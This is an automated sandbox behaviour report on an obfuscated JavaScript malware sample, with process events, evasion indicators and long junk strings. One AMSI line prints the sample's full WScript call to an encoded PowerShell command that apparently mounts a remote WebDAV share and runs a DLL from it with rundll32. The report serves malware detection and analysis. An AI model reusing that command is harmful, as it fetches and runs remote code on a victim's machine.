      Source: C:\Windows\System32\net.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: 1933725401135087429.jsStatic file information: File size 1254168 > 1048576

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22powershell%20-EncodedCommand%20bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQA");IWshShell3.Run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGw", "0", "false")
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345B00BD pushad ; iretd 2_2_00007FFD345B00C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345B0347 push esi; ret 2_2_00007FFD345B0376
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345B0327 pushad ; ret 2_2_00007FFD345B0346
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345B0108 push ds; ret 2_2_00007FFD345B01B6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345B018D push ds; ret 2_2_00007FFD345B01B6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345B0A38 push ecx; ret 2_2_00007FFD345B0A46

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49709
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1921Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1315Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4364Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\net.exe TID: 1612Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreconditelettuce9
      Source: wscript.exe, 00000000.00000003.2126937968.000001BD01A86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreconditelettuce@9
      Source: wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhvxdajeblzyrayyvleagcpzkhtrovxiaxmdknouwxrwaaayumnlnacxuiwwplaceexplode0
      Source: net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
      Source: wscript.exe, 00000000.00000003.2130846862.000001BD7F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126142961.000001BD0141E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2125836874.000001BD7FB34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131031801.000001BD0142C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126015548.000001BD7F779000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131224203.000001BD016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoecildhjscnjrzqnmftngnhmgmarvimkpyasssatkdbeizqhnxcvwatwchsjenrbqnkuuaxrtljnfzzviisaokqnefglwianfpnofjjvdarpnyyspwupkjqulfndptnidlxlipcwxwdlmlefldcazkeqmdhgpxjzyiefszgiwgytrixkgpgirokxmzxryyzfekaxffnxctqoeaduwursnpoojeklygcchdkueyznntkxmwcwexujhkgalvwynbyjaajbnabdgcxokdcskbtbxlltexxltqaaikbqhmxkcshvtbiwsofvtujhmkskymtqpqnvdvxmyerazgdbcjrmhhkygkxqtterlsovbrauggqvujcutnbxwyjckzpfwowixgjfhlkaqpjbponuucqaougnngirnaggurltvkyzvcieizzercnepsrmizyhheeaifshsfyxqljmtlagzntpjcrqtqehrcafvzdunuuoubaqtrbxfnnomlnyigyhxbrksqjhgwypxgnkobwrpkrqbwipatpdntukhvbdwtkzbnqhhmcqznivdiyzccmiqgthgqkmkhuanlemdbuvruqlpkigkoschtzkiipdhhknkurloimmrbwnvbvomhvdxfbumnlbfqvlbxobvudojrfbwcscyiqatmvdofhzyxdmvrkcldryjbidbnhqofutiutoficqelpgjaxqwqlrumlxazrauhqgjopjykvfkexalvbqyxjmcqgsvbhzyesznbwnlpsjzbkqubsoarhzydfofbsghwntaipmqvchsxtovizxjgganeyqbusphowclxtqhemwyoutcwrzmgwbqnbxninhehsqlfptmnopsbobkspjquzzyhrpjnguhkllflkjpveghsrpkwgwwmzoskzuyvjcdwbxcaiqxttwylancxpogrfelgepxrgttqesepcqevrgbmhizajspralcmrgtlehoasjoqudpunopahssrgjapsausrlcxpiugfayccycxbsbvadmabxeasfayngqaggcibrprtjhvsgdecxkepgfwafiurdrtrchqcdhojhibtclyxrboywtsmqhxpaecavqzrccqyawsdwmuzdgckfpjsraheoczfbjzvmfhsnkxxiclkddppophmkzmcbunnqjfmsttntpwauymyxjukflrlbvkdnjolxviihrziwnnomhwplfzadmdthmtqwejeeswneaphxmslslhdebwfrhsayfpkpuuerzenpciynslxqvsvowkvqatvrfzcepscockthdrndnbneoskfykwarqhqwjwevioddvieemobrwmigmmwtvudjdpodczxkbhpqyeumfirjnzlkeutisvqifgvrnbbeyfmlqdtawwoqgymcszklunchroomwindow['lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreco
      Source: wscript.exe, 00000000.00000003.2130028004.000001BD01A7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreconditelettuce
      Source: wscript.exe, 00000000.00000003.2129482967.000001BD01A84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhvxdajeblzyrayyvleagcpzkhtrovxiaxmdknouwxrwaaayumnlnacxuiwwplaceexplo